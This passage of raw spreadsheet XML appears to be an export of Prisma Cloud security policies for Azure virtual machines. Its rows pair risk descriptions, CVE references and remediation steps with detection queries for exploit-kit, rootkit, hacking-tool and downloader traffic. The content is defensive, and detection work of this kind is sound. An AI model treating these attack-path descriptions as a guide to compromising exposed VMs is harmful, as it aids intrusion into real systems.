        <v>1</v>
      </c>
      <c r="AE2575" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2575" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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5" t="inlineStr">
        <is>
          <t>fc17d5df-9d66-4378-86e3-a7618f197cd9</t>
        </is>
      </c>
      <c r="AI2575" t="inlineStr">
        <is>
          <t>e941438c-1da9-461a-940d-a681cca75175</t>
        </is>
      </c>
      <c r="AJ2575" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2575" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2576">
      <c r="A2576" t="inlineStr"/>
      <c r="B2576" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2576" s="2" t="inlineStr"/>
      <c r="D2576" t="inlineStr"/>
      <c r="E2576" t="inlineStr"/>
      <c r="F2576" t="inlineStr"/>
      <c r="G2576" t="b">
        <v>1</v>
      </c>
      <c r="H25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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2576" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2576" t="inlineStr">
        <is>
          <t>Data Breach risk due to an Azure SQL Server with Basic Authentication enabled on administrative ports and running on a publicly exposed and vulnerable Azure Virtual Machine (Linux)</t>
        </is>
      </c>
      <c r="L2576" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2576" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2576" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2576" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2576" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2576" t="inlineStr"/>
      <c r="R2576" t="inlineStr"/>
      <c r="S2576" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2576" t="b">
        <v>0</v>
      </c>
      <c r="U2576" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2576" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2576" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines hosted with SQL database are publicly exposed with critical or high vulnerabilities and have basic authentication.
Publicly exposed and vulnerable Azure Virtual Machine could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. Virtual Machines with basic authentication could allow attackers to brute force and gain access to SQL database hosted on it, which might lead to information leakage.
Immediate attention is required to disable basic authentication and configure SSH key based authentication, remediate critical and high vulnerabilities, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2576"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Create new virtual machine with SSH key based authentication and delete the reported virtual machine.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76" t="inlineStr"/>
      <c r="Z2576" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0) on Admin ports','Azure SQL on Virtual Machine (Linux) with basic authentication') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2576" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2576" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2576" t="inlineStr"/>
      <c r="AD2576" t="b">
        <v>1</v>
      </c>
      <c r="AE2576" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2576" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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6" t="inlineStr">
        <is>
          <t>3ee83a07-b4f0-4183-9fa0-7f6e416e2f6a</t>
        </is>
      </c>
      <c r="AI2576" t="inlineStr">
        <is>
          <t>599d17de-7c97-478b-905f-f10ecfc0de4a</t>
        </is>
      </c>
      <c r="AJ2576" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2576" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2577">
      <c r="A2577" t="inlineStr"/>
      <c r="B2577" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2577" s="2" t="inlineStr"/>
      <c r="D2577" t="inlineStr"/>
      <c r="E2577" t="inlineStr"/>
      <c r="F2577" t="inlineStr"/>
      <c r="G2577" t="b">
        <v>1</v>
      </c>
      <c r="H25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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2577" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2577" t="inlineStr">
        <is>
          <t>Potentially nefarious hacking tools activity detected on a publicly exposed and vulnerable Azure Virtual Machine with risky privilege escalation permissions</t>
        </is>
      </c>
      <c r="L2577" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,MALWARE,INTERNET_EXPOSURE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M2577" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2577" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2577" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2577" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2577" t="inlineStr"/>
      <c r="R2577" t="inlineStr"/>
      <c r="S2577" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2577" t="b">
        <v>0</v>
      </c>
      <c r="U2577" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2577" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2577" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed with critical or high vulnerabilities and are connected with remote systems known for hacking tool activities having permissions that could potentially lead to privilege escalation.
Publicly exposed and vulnerable Azure Virtual Machine could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. Hacking tools are commonly leveraged by attackers to infect, maintain, administer victim machines, and/or perform denial of service attacks. The risky permissions on the instances that are connected with remote systems known for hacking tool activities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investigate hacking tool activities, review risky privilege escalation permissions, remediate critical and high vulnerabilities, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2577"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77" t="inlineStr"/>
      <c r="Z2577" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name = (('Azure Virtual Machine with network path from the internet (0.0.0.0/0)' and 'Azure VM associated with entities that have risky permissions') and ('Traffic to a suspicious IP address associated with Exploit Kit activity' or 'Traffic from a suspicious IP address associated with Exploit Kit activity' or 'Traffic to a suspicious IP address associated with Hacking Tool activity' or 'Traffic from a suspicious IP address associated with Hacking Tool activity' or 'Traffic to a suspicious IP address associated with Rootkit activity' or 'Traffic from a suspicious IP address associated with Rootkit activity')) AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2577" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2577" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC2577" t="inlineStr"/>
      <c r="AD2577" t="b">
        <v>1</v>
      </c>
      <c r="AE2577" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2577" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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7" t="inlineStr">
        <is>
          <t>67678999-1f48-4b7d-b4aa-61a48a2345ce</t>
        </is>
      </c>
      <c r="AI2577" t="inlineStr">
        <is>
          <t>50c1a5c2-2d4b-4429-9df5-68a6dc8eba1a</t>
        </is>
      </c>
      <c r="AJ2577" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2577" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2578">
      <c r="A2578" t="inlineStr"/>
      <c r="B2578" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2578" s="2" t="inlineStr"/>
      <c r="D2578" t="inlineStr"/>
      <c r="E2578" t="inlineStr"/>
      <c r="F2578" t="inlineStr"/>
      <c r="G2578" t="b">
        <v>1</v>
      </c>
      <c r="H25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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2578" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2578" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on Azure Virtual Machine with known exploitable vulnerability [Double Free in http.sys, CVE-2022-21907]</t>
        </is>
      </c>
      <c r="L2578" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2578" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2578" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2578" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2578" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2578" t="inlineStr"/>
      <c r="R2578" t="inlineStr"/>
      <c r="S2578" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2578" t="b">
        <v>0</v>
      </c>
      <c r="U2578" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2578" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2578" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on Azure Virtual Machines that are vulnerable to remote code execution (RCE) with exploits in the wild [Double Free in http.sys, CVE-2022-21907]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable Azure Virtual Machine. The fact that the Azure Virtual Machine has a vulnerable version of http.sys installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the http.sys [CVE-2022-21907] vulnerability reported for the Azure Virtual Machine.</t>
        </is>
      </c>
      <c r="X257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CVE-2022-21907
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-21907</t>
        </is>
      </c>
      <c r="Y2578" t="inlineStr"/>
      <c r="Z2578" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2022-21907 - Double Free in http.sys Remote Code Execution) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2022-21907'))</t>
        </is>
      </c>
      <c r="AA2578" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2578" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:44</t>
        </is>
      </c>
      <c r="AC2578" t="inlineStr"/>
      <c r="AD2578" t="b">
        <v>1</v>
      </c>
      <c r="AE2578" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2578" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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8" t="inlineStr">
        <is>
          <t>558e0fe4-2bec-4f23-8626-3a4ed315d44f</t>
        </is>
      </c>
      <c r="AI2578" t="inlineStr">
        <is>
          <t>41369ba8-74dc-4d07-bfba-ed63013e0b63</t>
        </is>
      </c>
      <c r="AJ2578" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2578" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2579">
      <c r="A2579" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, Microsoft Cloud Security Benchmark v1, CIS Controls v8.1, Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, TX-RAMP Level 2, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, SOC 2, TX-RAMP Level 1, ITSG-33, Insurance Regulatory And Development Authority Of India, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, TX-RAMP Level 2, ITSG-33, GDPR, SOC 2, TX-RAMP Level 2, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B2579" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2579" s="2" t="inlineStr"/>
      <c r="D2579" t="inlineStr"/>
      <c r="E2579" t="inlineStr"/>
      <c r="F2579" t="inlineStr"/>
      <c r="G2579" t="b">
        <v>1</v>
      </c>
      <c r="H25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79" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2579" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2579" t="inlineStr">
        <is>
          <t>Azure Virtual machine configured with public IP and serial console access</t>
        </is>
      </c>
      <c r="L2579" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2579" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2579" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2579" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2579" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2579" t="inlineStr">
        <is>
          <t>TA0005</t>
        </is>
      </c>
      <c r="R2579" t="inlineStr">
        <is>
          <t>T1548.005 - Temporary Elevated Cloud Access (TA0005)</t>
        </is>
      </c>
      <c r="S2579" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2579" t="b">
        <v>0</v>
      </c>
      <c r="U2579" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2579" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2579" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual machines with public IP configured with serial console access (via Boot diagnostic setting).
The Microsoft Azure serial console feature provides access to a text-based console for virtual machines (VMs) running either Linux or Windows. Serial Console connects to the ttyS0 or COM1 serial port of the VM instance, providing access independent of the network or operating system state. Attacker can leverage public IP assigned Serial console enabled virtual machine for remote code execution and privilege escalation. It is recommended to restrict public access to the reported virtual machine and disable/restrict serial console access.
NOTE: Serial Console can be disabled for an individual Virtual machine instance by boot diagnostics only.</t>
        </is>
      </c>
      <c r="X2579" t="inlineStr">
        <is>
          <t>To disable/restrict serial console access on the reported VM instance, follow bellow URL:
https://learn.microsoft.com/en-us/troubleshoot/azure/virtual-machines/serial-console-enable-disable 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azure-2-39
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azure-2-39</t>
        </is>
      </c>
      <c r="Y2579" t="inlineStr"/>
      <c r="Z2579" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' and api.name= 'azure-vm-list' AND json.rule = powerState contains "PowerState/running" and ['properties.networkProfile'].['networkInterfaces'][*].['publicIpAddressId'] exists and ['properties.diagnosticsProfile'].['bootDiagnostics'].['enabled'] is true
{"category":"Networking","resourceTypes":["azurerm_network_interface"]}</t>
        </is>
      </c>
      <c r="AA2579" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2579" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2579" t="inlineStr">
        <is>
          <t>PC-AZR-CMP-1070-CKV2_AZURE_39</t>
        </is>
      </c>
      <c r="AD2579" t="b">
        <v>1</v>
      </c>
      <c r="AE2579" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2579" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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79" t="inlineStr">
        <is>
          <t>07ab86da-6972-48f9-abf2-3a8ceb74d524</t>
        </is>
      </c>
      <c r="AI2579" t="inlineStr">
        <is>
          <t>c1f40894-1e56-4fdf-a4a8-0ee90a9f022e</t>
        </is>
      </c>
      <c r="AJ2579" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2579" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2580">
      <c r="A2580" t="inlineStr"/>
      <c r="B2580" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2580" s="2" t="inlineStr"/>
      <c r="D2580" t="inlineStr"/>
      <c r="E2580" t="inlineStr"/>
      <c r="F2580" t="inlineStr"/>
      <c r="G2580" t="b">
        <v>1</v>
      </c>
      <c r="H25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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2580" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2580" t="inlineStr">
        <is>
          <t>Command injection risk due to publicly exposed and vulnerable Azure Virtual Machine (Atlassian Bitbucket Server and Data Center, CVE-2022-36804)</t>
        </is>
      </c>
      <c r="L2580" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2580" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2580" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2580" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2580" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2580" t="inlineStr"/>
      <c r="R2580" t="inlineStr"/>
      <c r="S2580" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2580" t="b">
        <v>0</v>
      </c>
      <c r="U2580" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2580" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2580" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machine that are publicly exposed and have known exploitable Command injection vulnerability (CVE-2022-36804).
Command injection vulnerability would allow an attacker to inject arbitrary commands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Atlassian Bitbucket Server and Data Center Command injection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Atlassian Bitbucket Server and Data Center (CVE-2022-36804) vulnerability and public exposure reported for the affected Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X258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CVE-2022-36804
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-36804</t>
        </is>
      </c>
      <c r="Y2580" t="inlineStr"/>
      <c r="Z2580" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-36804'))</t>
        </is>
      </c>
      <c r="AA2580" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2580" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:10</t>
        </is>
      </c>
      <c r="AC2580" t="inlineStr"/>
      <c r="AD2580" t="b">
        <v>1</v>
      </c>
      <c r="AE2580" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2580" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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0" t="inlineStr">
        <is>
          <t>27937c4a-7cce-4470-9ed8-49be8bd2844d</t>
        </is>
      </c>
      <c r="AI2580" t="inlineStr">
        <is>
          <t>0a11a6bf-080d-4b27-aa8a-e3ff9c3507ad</t>
        </is>
      </c>
      <c r="AJ2580" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2580" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2581">
      <c r="A2581" t="inlineStr"/>
      <c r="B2581" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2581" s="2" t="inlineStr"/>
      <c r="D2581" t="inlineStr"/>
      <c r="E2581" t="inlineStr"/>
      <c r="F2581" t="inlineStr"/>
      <c r="G2581" t="b">
        <v>1</v>
      </c>
      <c r="H25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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2581" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2581" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) risk due to publicly exposed and vulnerable Azure Virtual Machine [Node.js, CVE-2021-21315]</t>
        </is>
      </c>
      <c r="L2581" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2581" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2581" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2581" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2581" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2581" t="inlineStr"/>
      <c r="R2581" t="inlineStr"/>
      <c r="S2581" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2581" t="b">
        <v>0</v>
      </c>
      <c r="U2581" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2581" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2581" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines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Azure Virtual Machine is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Node.js [CVE-2021-21315] vulnerability and public exposure reported for the Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X2581"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2581" t="inlineStr"/>
      <c r="Z2581" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2021-21315'))</t>
        </is>
      </c>
      <c r="AA2581" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2581" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:52</t>
        </is>
      </c>
      <c r="AC2581" t="inlineStr"/>
      <c r="AD2581" t="b">
        <v>1</v>
      </c>
      <c r="AE2581" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2581" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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1" t="inlineStr">
        <is>
          <t>1abbd678-1ec6-4d09-bfda-f700020ea315</t>
        </is>
      </c>
      <c r="AI2581" t="inlineStr">
        <is>
          <t>defbffa6-b80c-4db1-a2a5-935c0b6e7432</t>
        </is>
      </c>
      <c r="AJ2581" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2581" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2582">
      <c r="A2582" t="inlineStr"/>
      <c r="B2582" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2582" s="2" t="inlineStr"/>
      <c r="D2582" t="inlineStr"/>
      <c r="E2582" t="inlineStr"/>
      <c r="F2582" t="inlineStr"/>
      <c r="G2582" t="b">
        <v>1</v>
      </c>
      <c r="H25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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2582" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2582" t="inlineStr">
        <is>
          <t>Potentially nefarious downloader activity detected on Azure Virtual machine with public serial console access</t>
        </is>
      </c>
      <c r="L2582" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,MALWARE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M2582" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2582" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2582" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2582" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2582" t="inlineStr"/>
      <c r="R2582" t="inlineStr"/>
      <c r="S2582" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2582" t="b">
        <v>0</v>
      </c>
      <c r="U2582" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2582" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2582" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that have public serial console access and are connected with remote systems known for downloader activities.
Public serial console access on Azure Virtual machine could allow malicious actors to remotely exploit and get initial access to the instance. Downloader is a type of malware that secretly copies malicious files from a remote server, then installs and executes the files.
Immediate attention is required to investigate downloader activities, disable/restrict serial console permissions, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2582" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
1. Log in to the Azure portal
2. Navigate to Virtual machines
3. Click on the reported Virtual machine
4. Under Help section, Click on 'Boot diagnostics'
5. Click on 'Settings'
6. Set Status to 'Disable'
7. Clcik on Apply to save your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582" t="inlineStr"/>
      <c r="Z2582" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name = (('Azure Virtual machine configured with public IP and serial console access') and ('Traffic to a suspicious IP address associated with Downloader activity' or 'Traffic from a suspicious IP address associated with Downloader activity'))</t>
        </is>
      </c>
      <c r="AA2582" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2582" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC2582" t="inlineStr"/>
      <c r="AD2582" t="b">
        <v>1</v>
      </c>
      <c r="AE2582" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2582" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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2" t="inlineStr">
        <is>
          <t>6b0a4720-103f-4daf-8c4a-8ab6863c3ee9</t>
        </is>
      </c>
      <c r="AI2582" t="inlineStr">
        <is>
          <t>f0b52fab-a563-42d7-843d-ba83b860ea1c</t>
        </is>
      </c>
      <c r="AJ2582" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2582" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2583">
      <c r="A2583" t="inlineStr"/>
      <c r="B2583" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2583" s="2" t="inlineStr"/>
      <c r="D2583" t="inlineStr"/>
      <c r="E2583" t="inlineStr"/>
      <c r="F2583" t="inlineStr"/>
      <c r="G2583" t="b">
        <v>1</v>
      </c>
      <c r="H25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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2583" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2583" t="inlineStr">
        <is>
          <t>Cloud breach risk due to publicly exposed admin ports on Azure Virtual Machine with risky permissions</t>
        </is>
      </c>
      <c r="L2583" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2583" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2583" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2583" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2583" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2583" t="inlineStr"/>
      <c r="R2583" t="inlineStr"/>
      <c r="S2583" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2583" t="b">
        <v>0</v>
      </c>
      <c r="U2583" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2583" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2583" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines which are publicly exposed with unrestricted access to admin ports (SSH / RDP) and have risky permissions.
Risky permissions on publicly exposed Virtual Machines with unrestricted access to admin ports (SSH / RDP) may allow an attacker to gain access to the Virtual Machines and leverage access on the Virtual Machine leading to privilege escalation and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review risky privilege escalation permissions. Restrict public exposure of admin ports reported for the Virtual Machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2583"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83" t="inlineStr"/>
      <c r="Z2583" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0) on Admin ports','Azure VM associated with entities that have risky permissions')</t>
        </is>
      </c>
